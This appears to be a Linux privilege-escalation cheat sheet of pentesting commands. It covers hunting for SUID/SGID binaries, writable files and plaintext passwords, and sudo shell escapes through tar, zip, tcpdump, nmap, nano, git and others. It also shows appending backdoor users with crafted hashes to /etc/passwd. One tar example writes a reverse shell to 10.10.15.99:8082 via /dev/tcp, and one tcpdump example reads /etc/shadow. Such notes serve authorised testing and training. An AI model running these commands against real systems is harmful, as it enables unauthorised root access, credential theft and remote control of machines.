Privilege Escalation

Tools

File Permissions

  • Check file permissions of /etc/passwd and /etc/shadow (a writable /etc/passwd or a readable /etc/shadow is the finding of interest)

Find writable files

find . -maxdepth 1 -type f -writable

Generate password hash (md5):

openssl passwd -1
echo 'joske' | openssl passwd -1 -stdin

Generate password hash (sha256, via crypt with a `$5$` salt; Python 2's crypt.crypt requires the salt argument):

python -c 'import crypt; print crypt.crypt("joske", "$5$salt")'

SUID / SGID Binaries

Find SUID

find . -perm /4000

Find SGID

find . -perm /2000

Find SUID / SGID

find . -perm /6000

Find and ls SUID / SGID

find "$DIRECTORY" -perm /6000 -exec ls -la {} \;

Searching world writable files (symlinks excluded)

find / -perm -o=w ! -type l -ls 2>/dev/null

Plain text username / password

grep -i user [filename]
grep -i pass [filename]
grep -C 5 "password" [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla (single quotes so the shell does not expand $password)

Commands with sudo

sudo -l

New file Permissions

umask

Exploits

overlayfs

Tar

sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/bash
echo -e '#!/bin/bash\n\nbash -i >& /dev/tcp/10.10.15.99/8082 0>&1' > a.sh
tar -cvf a.tar a.sh
sudo tar -xvf a.tar --to-command /bin/bash

Zip

sudo zip /tmp/test.zip /tmp/test -T --unzip-command="sh -c /bin/bash"

Strace

sudo strace -o/dev/null /bin/bash

tcpdump

echo $'id\ncat /etc/shadow' > /tmp/.shell
chmod +x /tmp/.shell
sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.shell -Z root

nmap

echo "os.execute('/bin/sh')" > /tmp/shell.nse
sudo nmap --script=/tmp/shell.nse

scp

sudo scp -S /path/yourscript x y

expect

sudo expect

type: spawn sh, then: sh

nano

sudo nano -S /bin/bash

type your command, then press CTRL+T

git

sudo git help status

type: !/bin/bash

gdb/ftp

sudo ftp

type : !/bin/sh

Add user with passwd

echo 'user2:*:1002:1003:,,,:/home/user2:/bin/bash' >> /etc/passwd
passwd user2

echo "user2:`openssl passwd -1 -salt user3 pass123`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`mkpasswd -m SHA-512 pass`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`python -c 'import crypt; print crypt.crypt("pass", "$6$salt")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`perl -le 'print crypt("pass123", "abc")'`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

echo "user2:`php -r "print(crypt('aarti','123') . \"\n\");"`:1002:1003:,,,:/home/user2:/bin/bash" >> /etc/passwd

Add root user

adduser username
usermod -aG sudo username

References